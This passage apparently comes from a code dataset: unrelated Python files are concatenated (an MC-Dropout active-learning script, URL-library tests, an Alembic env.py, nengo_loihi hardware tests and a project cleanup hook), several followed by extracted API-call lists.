    ])
    active_set, test_set = active_pascal(path=path,
                                          transform=transform,
                                          test_transform=test_transform,
                                          target_transform=target_transform)
    active_set.label_randomly(initial_pool)
    return active_set, test_set
def main():
    """Run the full MC-Dropout active-learning loop on Pascal VOC."""
    args = parse_args()
    batch_size = args.batch_size
    use_cuda = torch.cuda.is_available()
    hyperparams = vars(args)
    pprint(hyperparams)
    active_set, test_set = get_datasets(hyperparams['initial_pool'], hyperparams['data_path'])
    # We will use the FocalLoss
    criterion = FocalLoss(gamma=2, alpha=0.25)
    # Our model is a simple Unet
    model = smp.Unet(
        encoder_name='resnext50_32x4d',
        encoder_depth=5,
        encoder_weights='imagenet',
        decoder_use_batchnorm=False,
        classes=len(pascal_voc_ids)
    )
    # Add a Dropout layer to use MC-Dropout
    add_dropout(model, classes=len(pascal_voc_ids), activation=None)
    # This will enable Dropout at test time.
    model = MCDropoutModule(model)
    # Put everything on GPU.
    if use_cuda:
        model.cuda()
    # Make an optimizer
    optimizer = optim.SGD(model.parameters(), lr=hyperparams["lr"], momentum=0.9, weight_decay=5e-4)
    # Keep a copy of the original weights
    initial_weights = deepcopy(model.state_dict())
    # Add metrics
    model = ModelWrapper(model, criterion)
    model.add_metric('cls_report', lambda: ClassificationReport(len(pascal_voc_ids)))
    # Which heuristic you want to use?
    # We will use our custom reduction function.
    heuristic = get_heuristic(hyperparams['heuristic'], reduction=mean_regions)
    # The ALLoop is in charge of predicting the uncertainty and
    # labelling the most uncertain samples at each step.
    loop = ActiveLearningLoop(active_set,
                              model.predict_on_dataset_generator,
                              heuristic=heuristic,
                              ndata_to_label=hyperparams['n_data_to_label'],
                              # Instead of predicting on the entire pool, only a subset is used
                              max_sample=1000,
                              batch_size=batch_size,
                              iterations=hyperparams["iterations"],
                              use_cuda=use_cuda
                              )
    acc = []
    for epoch in tqdm(range(args.al_step)):
        # Following Gal et al. 2016, we reset the weights.
        model.load_state_dict(initial_weights)
        # Train 50 epochs before sampling.
        model.train_on_dataset(active_set, optimizer, batch_size, hyperparams['learning_epoch'],
                               use_cuda)
        # Validation!
        model.test_on_dataset(test_set, batch_size, use_cuda)
        # loop.step() labels the next batch; False means the pool is empty.
        should_continue = loop.step()
        metrics = model.metrics
        val_loss = metrics['test_loss'].value
        logs = {
            "val": val_loss,
            "epoch": epoch,
            "train": metrics['train_loss'].value,
            "labeled_data": active_set.labelled,
            "Next Training set size": len(active_set),
            'cls_report': metrics['test_cls_report'].value,
        }
        pprint(logs)
        acc.append(logs)
        if not should_continue:
            break
# Script entry point.
if __name__ == "__main__":
    main()
|
[
"baal.bayesian.dropout.MCDropoutModule",
"baal.get_heuristic",
"baal.ActiveLearningLoop",
"argparse.ArgumentParser",
"utils.active_pascal",
"torchvision.transforms.transforms.ToTensor",
"torch.nn.functional.adaptive_avg_pool2d",
"utils.FocalLoss",
"torch.cuda.is_available",
"pprint.pprint",
"baal.ModelWrapper",
"torchvision.transforms.transforms.CenterCrop",
"torchvision.transforms.transforms.Normalize",
"baal.PILToLongTensor",
"torchvision.transforms.transforms.Resize",
"torch.from_numpy"
] |
[((829, 862), 'torch.from_numpy', 'torch.from_numpy', (['n[:, None, ...]'], {}), '(n[:, None, ...])\n', (845, 862), False, 'import torch\n'), ((907, 942), 'torch.nn.functional.adaptive_avg_pool2d', 'F.adaptive_avg_pool2d', (['n', 'grid_size'], {}), '(n, grid_size)\n', (928, 942), True, 'import torch.nn.functional as F\n'), ((1039, 1064), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (1062, 1064), False, 'import argparse\n'), ((2444, 2559), 'utils.active_pascal', 'active_pascal', ([], {'path': 'path', 'transform': 'transform', 'test_transform': 'test_transform', 'target_transform': 'target_transform'}), '(path=path, transform=transform, test_transform=test_transform,\n target_transform=target_transform)\n', (2457, 2559), False, 'from utils import pascal_voc_ids, active_pascal, add_dropout, FocalLoss\n'), ((2841, 2866), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (2864, 2866), False, 'import torch\n'), ((2900, 2919), 'pprint.pprint', 'pprint', (['hyperparams'], {}), '(hyperparams)\n', (2906, 2919), False, 'from pprint import pprint\n'), ((3065, 3095), 'utils.FocalLoss', 'FocalLoss', ([], {'gamma': '(2)', 'alpha': '(0.25)'}), '(gamma=2, alpha=0.25)\n', (3074, 3095), False, 'from utils import pascal_voc_ids, active_pascal, add_dropout, FocalLoss\n'), ((3502, 3524), 'baal.bayesian.dropout.MCDropoutModule', 'MCDropoutModule', (['model'], {}), '(model)\n', (3517, 3524), False, 'from baal.bayesian.dropout import MCDropoutModule\n'), ((3843, 3873), 'baal.ModelWrapper', 'ModelWrapper', (['model', 'criterion'], {}), '(model, criterion)\n', (3855, 3873), False, 'from baal import ModelWrapper\n'), ((4065, 4128), 'baal.get_heuristic', 'get_heuristic', (["hyperparams['heuristic']"], {'reduction': 'mean_regions'}), "(hyperparams['heuristic'], reduction=mean_regions)\n", (4078, 4128), False, 'from baal import get_heuristic, ActiveLearningLoop\n'), ((4205, 4449), 'baal.ActiveLearningLoop', 'ActiveLearningLoop', (['active_set', 
'model.predict_on_dataset_generator'], {'heuristic': 'heuristic', 'ndata_to_label': "hyperparams['n_data_to_label']", 'max_sample': '(1000)', 'batch_size': 'batch_size', 'iterations': "hyperparams['iterations']", 'use_cuda': 'use_cuda'}), "(active_set, model.predict_on_dataset_generator,\n heuristic=heuristic, ndata_to_label=hyperparams['n_data_to_label'],\n max_sample=1000, batch_size=batch_size, iterations=hyperparams[\n 'iterations'], use_cuda=use_cuda)\n", (4223, 4449), False, 'from baal import get_heuristic, ActiveLearningLoop\n'), ((5626, 5638), 'pprint.pprint', 'pprint', (['logs'], {}), '(logs)\n', (5632, 5638), False, 'from pprint import pprint\n'), ((1868, 1890), 'torchvision.transforms.transforms.Resize', 'transforms.Resize', (['(512)'], {}), '(512)\n', (1885, 1890), False, 'from torchvision.transforms import transforms\n'), ((1892, 1922), 'torchvision.transforms.transforms.CenterCrop', 'transforms.CenterCrop', (['IM_SIZE'], {}), '(IM_SIZE)\n', (1913, 1922), False, 'from torchvision.transforms import transforms\n'), ((1924, 1945), 'torchvision.transforms.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (1943, 1945), False, 'from torchvision.transforms import transforms\n'), ((1956, 2022), 'torchvision.transforms.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (1976, 2022), False, 'from torchvision.transforms import transforms\n'), ((2077, 2099), 'torchvision.transforms.transforms.Resize', 'transforms.Resize', (['(512)'], {}), '(512)\n', (2094, 2099), False, 'from torchvision.transforms import transforms\n'), ((2101, 2131), 'torchvision.transforms.transforms.CenterCrop', 'transforms.CenterCrop', (['IM_SIZE'], {}), '(IM_SIZE)\n', (2122, 2131), False, 'from torchvision.transforms import transforms\n'), ((2133, 2154), 'torchvision.transforms.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (2152, 2154), False, 'from 
torchvision.transforms import transforms\n'), ((2165, 2231), 'torchvision.transforms.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (2185, 2231), False, 'from torchvision.transforms import transforms\n'), ((2289, 2340), 'torchvision.transforms.transforms.Resize', 'transforms.Resize', (['(512)'], {'interpolation': 'Image.NEAREST'}), '(512, interpolation=Image.NEAREST)\n', (2306, 2340), False, 'from torchvision.transforms import transforms\n'), ((2342, 2372), 'torchvision.transforms.transforms.CenterCrop', 'transforms.CenterCrop', (['IM_SIZE'], {}), '(IM_SIZE)\n', (2363, 2372), False, 'from torchvision.transforms import transforms\n'), ((2383, 2414), 'baal.PILToLongTensor', 'PILToLongTensor', (['pascal_voc_ids'], {}), '(pascal_voc_ids)\n', (2398, 2414), False, 'from baal import PILToLongTensor\n')]
|
""" Test suite for the murls module. """
from murls import http, https
def test_init():
assert http('site.com') == 'http://site.com'
assert https('site.com') == 'https://site.com'
def test_path():
url = http('site.com')
assert url.path('foo', 'bar') == 'http://site.com/foo/bar'
assert url.path('foo') == 'http://site.com/foo'
def test_query():
url = http('site.com')
assert url.query(foo='bar', bar='foo') == 'http://site.com?foo=bar&bar=foo' or 'http://site.com?bar=foo&foo=bar'
assert url.query(foo='foo') == 'http://site.com?foo=foo&bar=foo' or 'http://site.com?bar=foo&foo=foo'
|
[
"murls.http",
"murls.https"
] |
[((221, 237), 'murls.http', 'http', (['"""site.com"""'], {}), "('site.com')\n", (225, 237), False, 'from murls import http, https\n'), ((383, 399), 'murls.http', 'http', (['"""site.com"""'], {}), "('site.com')\n", (387, 399), False, 'from murls import http, https\n'), ((103, 119), 'murls.http', 'http', (['"""site.com"""'], {}), "('site.com')\n", (107, 119), False, 'from murls import http, https\n'), ((152, 169), 'murls.https', 'https', (['"""site.com"""'], {}), "('site.com')\n", (157, 169), False, 'from murls import http, https\n')]
|
import os
import sys
import asyncio
import debugpy
from sqlalchemy import engine_from_config
from sqlalchemy import pool
from sqlalchemy.ext.asyncio import AsyncEngine
from sqlalchemy.ext.asyncio import create_async_engine
from alembic import context
from alembic.config import Config
# debugpy.listen(5678)
# print("Waiting for debugger attach")
# debugpy.wait_for_client()
# debugpy.breakpoint()
# print('break on this line')
# print("==== start alembic ==")
# https://stackoverflow.com/a/66772223/6652082
if sys.platform.startswith("win"):
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(
os.path.dirname(
os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
)
)
from app.models.base import Base
from app import create_app
try:
config = context.config # noqa
except Exception:
ini_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "../alembic.ini"
)
ini_path = os.path.abspath(ini_path)
config = Config(ini_path)
# add your model's MetaData object here
# for 'autogenerate' support
# from myapp import mymodel
# target_metadata = mymodel.Base.metadata
target_metadata = None
# other values from the config, defined by the needs of env.py,
# can be acquired:
# my_important_option = config.get_main_option("my_important_option")
# ... etc.
# https://gist.github.com/utek/6163250
def exclude_tables_from_config(config_):
tables_ = config_.get("tables", None)
if tables_ is not None:
tables = tables_.split(",")
else:
tables = []
new_tables = []
for table in tables:
table = table.strip()
new_tables.append(table)
return new_tables
# [alembic:exclude]
# table_col = products.create_at, users.updated_at
def exclude_colum_from_config(config_):
columns_ = config_.get("table_col")
if columns_ is not None:
columns = columns_.split(",")
else:
columns = []
new_columns = []
for column in columns:
column = column.strip()
new_columns.append(column)
return new_columns
exclude_tables = exclude_tables_from_config(
config.get_section("alembic:exclude")
)
exclude_table_cols = exclude_colum_from_config(
config.get_section("alembic:exclude")
)
def include_object(object, name, type_, *args, **kwargs):
ret_table = not (type_ == "table" and name in exclude_tables)
ret_col = not (type_ == "column" and name in exclude_table_cols)
return ret_table and ret_col
application = create_app(os.getenv("FASTAPI_CONFIG") or "default")
target_metadata = Base.metadata
def get_url():
global application
url = application.config["DATABASE_URI"]
return url
def run_migrations_offline():
"""Run migrations in 'offline' mode.
This configures the context with just a URL
and not an Engine, though an Engine is acceptable
here as well. By skipping the Engine creation
we don't even need a DBAPI to be available.
Calls to context.execute() here emit the given string to the
script output.
"""
print("offline mode")
global configure
url = get_url()
context.configure(
url=url,
target_metadata=target_metadata,
literal_binds=True,
include_object=include_object,
dialect_opts={"paramstyle": "named"},
)
with context.begin_transaction():
context.run_migrations()
def do_run_migrations(connection):
context.configure(
connection=connection,
target_metadata=target_metadata,
include_object=include_object,
)
with context.begin_transaction():
context.run_migrations()
async def run_migrations_online():
"""Run migrations in 'online' mode.
In this scenario we need to create an Engine
and associate a connection with the context.
"""
print("online mode")
url = get_url()
# connectable = AsyncEngine(
# engine_from_config(
# config,
# url=url,
# prefix="sqlalchemy.",
# poolclass=pool.NullPool,
# future=True,
# )
# )
connectable = create_async_engine(url, future=True, echo=True)
async with connectable.connect() as connection:
await connection.run_sync(do_run_migrations)
if __name__ == "__main__":
# run_migrations_offline()
asyncio.run(run_migrations_online())
else:
if context.is_offline_mode():
run_migrations_offline()
else:
asyncio.run(run_migrations_online())
print("==== end alembic ==")
|
[
"sys.platform.startswith",
"alembic.context.is_offline_mode",
"os.path.abspath",
"alembic.config.Config",
"alembic.context.begin_transaction",
"sqlalchemy.ext.asyncio.create_async_engine",
"alembic.context.configure",
"alembic.context.run_migrations",
"os.getenv",
"asyncio.WindowsSelectorEventLoopPolicy"
] |
[((515, 545), 'sys.platform.startswith', 'sys.platform.startswith', (['"""win"""'], {}), "('win')\n", (538, 545), False, 'import sys\n'), ((3228, 3381), 'alembic.context.configure', 'context.configure', ([], {'url': 'url', 'target_metadata': 'target_metadata', 'literal_binds': '(True)', 'include_object': 'include_object', 'dialect_opts': "{'paramstyle': 'named'}"}), "(url=url, target_metadata=target_metadata, literal_binds=\n True, include_object=include_object, dialect_opts={'paramstyle': 'named'})\n", (3245, 3381), False, 'from alembic import context\n'), ((3537, 3645), 'alembic.context.configure', 'context.configure', ([], {'connection': 'connection', 'target_metadata': 'target_metadata', 'include_object': 'include_object'}), '(connection=connection, target_metadata=target_metadata,\n include_object=include_object)\n', (3554, 3645), False, 'from alembic import context\n'), ((4223, 4271), 'sqlalchemy.ext.asyncio.create_async_engine', 'create_async_engine', (['url'], {'future': '(True)', 'echo': '(True)'}), '(url, future=True, echo=True)\n', (4242, 4271), False, 'from sqlalchemy.ext.asyncio import create_async_engine\n'), ((4492, 4517), 'alembic.context.is_offline_mode', 'context.is_offline_mode', ([], {}), '()\n', (4515, 4517), False, 'from alembic import context\n'), ((581, 621), 'asyncio.WindowsSelectorEventLoopPolicy', 'asyncio.WindowsSelectorEventLoopPolicy', ([], {}), '()\n', (619, 621), False, 'import asyncio\n'), ((1056, 1081), 'os.path.abspath', 'os.path.abspath', (['ini_path'], {}), '(ini_path)\n', (1071, 1081), False, 'import os\n'), ((1095, 1111), 'alembic.config.Config', 'Config', (['ini_path'], {}), '(ini_path)\n', (1101, 1111), False, 'from alembic.config import Config\n'), ((2614, 2641), 'os.getenv', 'os.getenv', (['"""FASTAPI_CONFIG"""'], {}), "('FASTAPI_CONFIG')\n", (2623, 2641), False, 'import os\n'), ((3434, 3461), 'alembic.context.begin_transaction', 'context.begin_transaction', ([], {}), '()\n', (3459, 3461), False, 'from alembic import 
context\n'), ((3471, 3495), 'alembic.context.run_migrations', 'context.run_migrations', ([], {}), '()\n', (3493, 3495), False, 'from alembic import context\n'), ((3683, 3710), 'alembic.context.begin_transaction', 'context.begin_transaction', ([], {}), '()\n', (3708, 3710), False, 'from alembic import context\n'), ((3720, 3744), 'alembic.context.run_migrations', 'context.run_migrations', ([], {}), '()\n', (3742, 3744), False, 'from alembic import context\n'), ((673, 698), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (688, 698), False, 'import os\n'), ((780, 805), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (795, 805), False, 'import os\n'), ((990, 1015), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (1005, 1015), False, 'import os\n')]
|
from abc import ABC, abstractmethod
from collections import OrderedDict
from functools import reduce
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import gym
import matplotlib.pyplot as plt
class Params():
"""
policy which outputs the policy parameters directly, i.e. for direct optimization
"""
def __init__(self, dim_in=7, dim_act=6):
self.dim_act = dim_act
self.init_params()
def init_params(self):
self.params = np.random.randn(self.dim_act)/3 - 1.75
self.num_params = self.dim_act
def forward(self, obs):
return self.get_params()
def get_params(self):
return self.params
def set_params(self, params):
assert params.shape == self.params.shape
self.params = params
def reset(self):
pass
if __name__ == "__main__":
# run tests
print("OK")
|
[
"numpy.random.randn"
] |
[((517, 546), 'numpy.random.randn', 'np.random.randn', (['self.dim_act'], {}), '(self.dim_act)\n', (532, 546), True, 'import numpy as np\n')]
|
from sklearn.model_selection import StratifiedKFold
import pandas as pd
skf = StratifiedKFold(n_splits=10, random_state=48, shuffle=True)
def CV(predictors,target):
for fold, (train_index, test_index) in enumerate(skf.split(predictors, target)):
x_train, x_valid = pd.DataFrame(predictors.iloc[train_index]), pd.DataFrame(predictors.iloc[test_index])
y_train, y_valid = target.iloc[train_index], target.iloc[test_index]
return x_train, x_valid, y_train, y_valid
|
[
"pandas.DataFrame",
"sklearn.model_selection.StratifiedKFold"
] |
[((79, 138), 'sklearn.model_selection.StratifiedKFold', 'StratifiedKFold', ([], {'n_splits': '(10)', 'random_state': '(48)', 'shuffle': '(True)'}), '(n_splits=10, random_state=48, shuffle=True)\n', (94, 138), False, 'from sklearn.model_selection import StratifiedKFold\n'), ((284, 326), 'pandas.DataFrame', 'pd.DataFrame', (['predictors.iloc[train_index]'], {}), '(predictors.iloc[train_index])\n', (296, 326), True, 'import pandas as pd\n'), ((328, 369), 'pandas.DataFrame', 'pd.DataFrame', (['predictors.iloc[test_index]'], {}), '(predictors.iloc[test_index])\n', (340, 369), True, 'import pandas as pd\n')]
|
import socket
import nengo
import numpy as np
import pytest
from nengo.exceptions import SimulationError
from nengo_loihi.block import Axon, LoihiBlock, Synapse
from nengo_loihi.builder.builder import Model
from nengo_loihi.builder.discretize import discretize_model
from nengo_loihi.hardware import interface as hardware_interface
from nengo_loihi.hardware.allocators import Greedy
from nengo_loihi.hardware.builder import build_board
from nengo_loihi.hardware.nxsdk_shim import NxsdkBoard
class MockNxsdk:
def __init__(self):
self.__version__ = None
def test_error_on_old_version(monkeypatch):
mock = MockNxsdk()
mock.__version__ = "0.5.5"
monkeypatch.setattr(hardware_interface, "nxsdk", mock)
with pytest.raises(ImportError, match="nxsdk"):
hardware_interface.HardwareInterface.check_nxsdk_version()
def test_no_warn_on_current_version(monkeypatch):
mock = MockNxsdk()
mock.__version__ = str(hardware_interface.HardwareInterface.max_nxsdk_version)
monkeypatch.setattr(hardware_interface, "nxsdk", mock)
monkeypatch.setattr(hardware_interface, "assert_nxsdk", lambda: True)
with pytest.warns(None) as record:
hardware_interface.HardwareInterface.check_nxsdk_version()
assert len(record) == 0
def test_warn_on_future_version(monkeypatch):
mock = MockNxsdk()
mock.__version__ = "100.0.0"
monkeypatch.setattr(hardware_interface, "nxsdk", mock)
monkeypatch.setattr(hardware_interface, "assert_nxsdk", lambda: True)
with pytest.warns(UserWarning):
hardware_interface.HardwareInterface.check_nxsdk_version()
def test_builder_poptype_errors():
pytest.importorskip("nxsdk")
# Test error in build_synapse
model = Model()
block = LoihiBlock(1)
block.compartment.configure_lif()
model.add_block(block)
synapse = Synapse(1)
synapse.set_weights([[1]])
synapse.pop_type = 8
block.add_synapse(synapse)
discretize_model(model)
allocator = Greedy() # one core per ensemble
board = allocator(model, n_chips=1)
with pytest.raises(ValueError, match="unrecognized pop_type"):
build_board(board)
# Test error in build_axon
model = Model()
block0 = LoihiBlock(1)
block0.compartment.configure_lif()
model.add_block(block0)
block1 = LoihiBlock(1)
block1.compartment.configure_lif()
model.add_block(block1)
axon = Axon(1)
block0.add_axon(axon)
synapse = Synapse(1)
synapse.set_weights([[1]])
synapse.pop_type = 8
axon.target = synapse
block1.add_synapse(synapse)
discretize_model(model)
board = allocator(model, n_chips=1)
with pytest.raises(ValueError, match="unrecognized pop_type"):
build_board(board)
def test_host_snip_recv_bytes():
host_snip = hardware_interface.HostSnip(None)
# We bypass the host_snip.connect method and connect manually
host_address = "127.0.0.1" # Standard loopback interface address
# Configure socket to send data to itself
host_snip.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host_snip.socket.bind((host_address, host_snip.port))
host_snip.socket.connect((host_address, host_snip.port))
# Generate random data to send
data = np.random.randint(0, 8192, size=1100, dtype=np.int32)
# Correctly receive data in two chunks
# Note that chunks are 4096 bytes at the smallest (HostSnip.recv_size)
host_snip.send_all(data)
received = host_snip.recv_bytes(1024 * 4)
assert np.all(received == data[:1024])
rest = 1100 - 1024
received = host_snip.recv_bytes(rest * 4)
assert np.all(received == data[-rest:])
# Send too little data
host_snip.send_all(data)
with pytest.raises(RuntimeError, match="less than expected"):
host_snip.recv_bytes(1536 * 4)
# Send shutdown signal at the end
data[-1] = -1
host_snip.send_all(data)
with pytest.raises(RuntimeError, match="shutdown signal from chip"):
host_snip.recv_bytes(1100 * 4)
# Too little data with shutdown signal still raises too little data
host_snip.send_all(data)
with pytest.raises(RuntimeError, match="less than expected"):
host_snip.recv_bytes(2048 * 4)
@pytest.mark.target_loihi
def test_interface_connection_errors(Simulator, monkeypatch):
with nengo.Network() as net:
nengo.Ensemble(2, 1)
# test opening closed interface error
sim = Simulator(net)
interface = sim.sims["loihi"]
interface.close()
with pytest.raises(SimulationError, match="cannot be reopened"):
with interface:
pass
sim.close()
# test failed connection error
def start(*args, **kwargs):
raise Exception("Mock failure to connect")
monkeypatch.setattr(NxsdkBoard, "start", start)
with pytest.raises(SimulationError, match="Mock failure to connect"):
with Simulator(net):
pass
@pytest.mark.filterwarnings("ignore:Model is precomputable.")
@pytest.mark.target_loihi
def test_snip_input_count(Simulator, seed, plt):
with nengo.Network(seed=seed) as model:
a = nengo.Ensemble(100, 1)
for i in range(30):
stim = nengo.Node(0.5)
nengo.Connection(stim, a, synapse=None)
with Simulator(model, precompute=False) as sim:
with pytest.warns(UserWarning, match="Too many spikes"):
sim.run(0.01)
|
[
"nengo_loihi.builder.builder.Model",
"nengo_loihi.block.Axon",
"numpy.random.randint",
"nengo.Connection",
"nengo_loihi.hardware.builder.build_board",
"pytest.warns",
"nengo.Node",
"nengo_loihi.block.LoihiBlock",
"nengo_loihi.hardware.interface.HostSnip",
"pytest.raises",
"nengo.Network",
"nengo_loihi.hardware.allocators.Greedy",
"nengo.Ensemble",
"numpy.all",
"pytest.importorskip",
"nengo_loihi.block.Synapse",
"nengo_loihi.hardware.interface.HardwareInterface.check_nxsdk_version",
"pytest.mark.filterwarnings",
"nengo_loihi.builder.discretize.discretize_model"
] |
[((4928, 4988), 'pytest.mark.filterwarnings', 'pytest.mark.filterwarnings', (['"""ignore:Model is precomputable."""'], {}), "('ignore:Model is precomputable.')\n", (4954, 4988), False, 'import pytest\n'), ((1655, 1683), 'pytest.importorskip', 'pytest.importorskip', (['"""nxsdk"""'], {}), "('nxsdk')\n", (1674, 1683), False, 'import pytest\n'), ((1731, 1738), 'nengo_loihi.builder.builder.Model', 'Model', ([], {}), '()\n', (1736, 1738), False, 'from nengo_loihi.builder.builder import Model\n'), ((1751, 1764), 'nengo_loihi.block.LoihiBlock', 'LoihiBlock', (['(1)'], {}), '(1)\n', (1761, 1764), False, 'from nengo_loihi.block import Axon, LoihiBlock, Synapse\n'), ((1845, 1855), 'nengo_loihi.block.Synapse', 'Synapse', (['(1)'], {}), '(1)\n', (1852, 1855), False, 'from nengo_loihi.block import Axon, LoihiBlock, Synapse\n'), ((1948, 1971), 'nengo_loihi.builder.discretize.discretize_model', 'discretize_model', (['model'], {}), '(model)\n', (1964, 1971), False, 'from nengo_loihi.builder.discretize import discretize_model\n'), ((1989, 1997), 'nengo_loihi.hardware.allocators.Greedy', 'Greedy', ([], {}), '()\n', (1995, 1997), False, 'from nengo_loihi.hardware.allocators import Greedy\n'), ((2202, 2209), 'nengo_loihi.builder.builder.Model', 'Model', ([], {}), '()\n', (2207, 2209), False, 'from nengo_loihi.builder.builder import Model\n'), ((2223, 2236), 'nengo_loihi.block.LoihiBlock', 'LoihiBlock', (['(1)'], {}), '(1)\n', (2233, 2236), False, 'from nengo_loihi.block import Axon, LoihiBlock, Synapse\n'), ((2317, 2330), 'nengo_loihi.block.LoihiBlock', 'LoihiBlock', (['(1)'], {}), '(1)\n', (2327, 2330), False, 'from nengo_loihi.block import Axon, LoihiBlock, Synapse\n'), ((2410, 2417), 'nengo_loihi.block.Axon', 'Axon', (['(1)'], {}), '(1)\n', (2414, 2417), False, 'from nengo_loihi.block import Axon, LoihiBlock, Synapse\n'), ((2459, 2469), 'nengo_loihi.block.Synapse', 'Synapse', (['(1)'], {}), '(1)\n', (2466, 2469), False, 'from nengo_loihi.block import Axon, LoihiBlock, Synapse\n'), 
((2589, 2612), 'nengo_loihi.builder.discretize.discretize_model', 'discretize_model', (['model'], {}), '(model)\n', (2605, 2612), False, 'from nengo_loihi.builder.discretize import discretize_model\n'), ((2800, 2833), 'nengo_loihi.hardware.interface.HostSnip', 'hardware_interface.HostSnip', (['None'], {}), '(None)\n', (2827, 2833), True, 'from nengo_loihi.hardware import interface as hardware_interface\n'), ((3259, 3312), 'numpy.random.randint', 'np.random.randint', (['(0)', '(8192)'], {'size': '(1100)', 'dtype': 'np.int32'}), '(0, 8192, size=1100, dtype=np.int32)\n', (3276, 3312), True, 'import numpy as np\n'), ((3518, 3549), 'numpy.all', 'np.all', (['(received == data[:1024])'], {}), '(received == data[:1024])\n', (3524, 3549), True, 'import numpy as np\n'), ((3630, 3662), 'numpy.all', 'np.all', (['(received == data[-rest:])'], {}), '(received == data[-rest:])\n', (3636, 3662), True, 'import numpy as np\n'), ((737, 778), 'pytest.raises', 'pytest.raises', (['ImportError'], {'match': '"""nxsdk"""'}), "(ImportError, match='nxsdk')\n", (750, 778), False, 'import pytest\n'), ((788, 846), 'nengo_loihi.hardware.interface.HardwareInterface.check_nxsdk_version', 'hardware_interface.HardwareInterface.check_nxsdk_version', ([], {}), '()\n', (844, 846), True, 'from nengo_loihi.hardware import interface as hardware_interface\n'), ((1148, 1166), 'pytest.warns', 'pytest.warns', (['None'], {}), '(None)\n', (1160, 1166), False, 'import pytest\n'), ((1186, 1244), 'nengo_loihi.hardware.interface.HardwareInterface.check_nxsdk_version', 'hardware_interface.HardwareInterface.check_nxsdk_version', ([], {}), '()\n', (1242, 1244), True, 'from nengo_loihi.hardware import interface as hardware_interface\n'), ((1520, 1545), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (1532, 1545), False, 'import pytest\n'), ((1555, 1613), 'nengo_loihi.hardware.interface.HardwareInterface.check_nxsdk_version', 'hardware_interface.HardwareInterface.check_nxsdk_version', ([], {}), 
'()\n', (1611, 1613), True, 'from nengo_loihi.hardware import interface as hardware_interface\n'), ((2073, 2129), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': '"""unrecognized pop_type"""'}), "(ValueError, match='unrecognized pop_type')\n", (2086, 2129), False, 'import pytest\n'), ((2139, 2157), 'nengo_loihi.hardware.builder.build_board', 'build_board', (['board'], {}), '(board)\n', (2150, 2157), False, 'from nengo_loihi.hardware.builder import build_board\n'), ((2664, 2720), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': '"""unrecognized pop_type"""'}), "(ValueError, match='unrecognized pop_type')\n", (2677, 2720), False, 'import pytest\n'), ((2730, 2748), 'nengo_loihi.hardware.builder.build_board', 'build_board', (['board'], {}), '(board)\n', (2741, 2748), False, 'from nengo_loihi.hardware.builder import build_board\n'), ((3729, 3784), 'pytest.raises', 'pytest.raises', (['RuntimeError'], {'match': '"""less than expected"""'}), "(RuntimeError, match='less than expected')\n", (3742, 3784), False, 'import pytest\n'), ((3920, 3982), 'pytest.raises', 'pytest.raises', (['RuntimeError'], {'match': '"""shutdown signal from chip"""'}), "(RuntimeError, match='shutdown signal from chip')\n", (3933, 3982), False, 'import pytest\n'), ((4134, 4189), 'pytest.raises', 'pytest.raises', (['RuntimeError'], {'match': '"""less than expected"""'}), "(RuntimeError, match='less than expected')\n", (4147, 4189), False, 'import pytest\n'), ((4329, 4344), 'nengo.Network', 'nengo.Network', ([], {}), '()\n', (4342, 4344), False, 'import nengo\n'), ((4361, 4381), 'nengo.Ensemble', 'nengo.Ensemble', (['(2)', '(1)'], {}), '(2, 1)\n', (4375, 4381), False, 'import nengo\n'), ((4515, 4573), 'pytest.raises', 'pytest.raises', (['SimulationError'], {'match': '"""cannot be reopened"""'}), "(SimulationError, match='cannot be reopened')\n", (4528, 4573), False, 'import pytest\n'), ((4814, 4877), 'pytest.raises', 'pytest.raises', (['SimulationError'], {'match': '"""Mock 
failure to connect"""'}), "(SimulationError, match='Mock failure to connect')\n", (4827, 4877), False, 'import pytest\n'), ((5073, 5097), 'nengo.Network', 'nengo.Network', ([], {'seed': 'seed'}), '(seed=seed)\n', (5086, 5097), False, 'import nengo\n'), ((5120, 5142), 'nengo.Ensemble', 'nengo.Ensemble', (['(100)', '(1)'], {}), '(100, 1)\n', (5134, 5142), False, 'import nengo\n'), ((5190, 5205), 'nengo.Node', 'nengo.Node', (['(0.5)'], {}), '(0.5)\n', (5200, 5205), False, 'import nengo\n'), ((5218, 5257), 'nengo.Connection', 'nengo.Connection', (['stim', 'a'], {'synapse': 'None'}), '(stim, a, synapse=None)\n', (5234, 5257), False, 'import nengo\n'), ((5323, 5373), 'pytest.warns', 'pytest.warns', (['UserWarning'], {'match': '"""Too many spikes"""'}), "(UserWarning, match='Too many spikes')\n", (5335, 5373), False, 'import pytest\n')]
|
import shutil
import subprocess
import json
import os
# CLEANUP
MANIFEST_FILE = "manifest.json"
def cleanup_disabled_features():
print("⚒ Cleaning up...")
with open(MANIFEST_FILE) as manifest_file:
manifest = json.load(manifest_file)
for feature in manifest["features"]:
if not feature["enabled"]:
for resource in feature["resources"]:
remove_resource(resource)
remove_resource(MANIFEST_FILE)
print("✔ Cleanup complete")
def remove_resource(resource):
if os.path.isfile(resource):
os.remove(resource)
elif os.path.isdir(resource):
shutil.rmtree(resource)
# ENVIRONMENT SETUP
def build_environment():
print("⚒ Building the environment...")
try:
create_virtual_environment()
install_dependencies()
print("✔ The environment is ready")
except subprocess.CalledProcessError:
print(
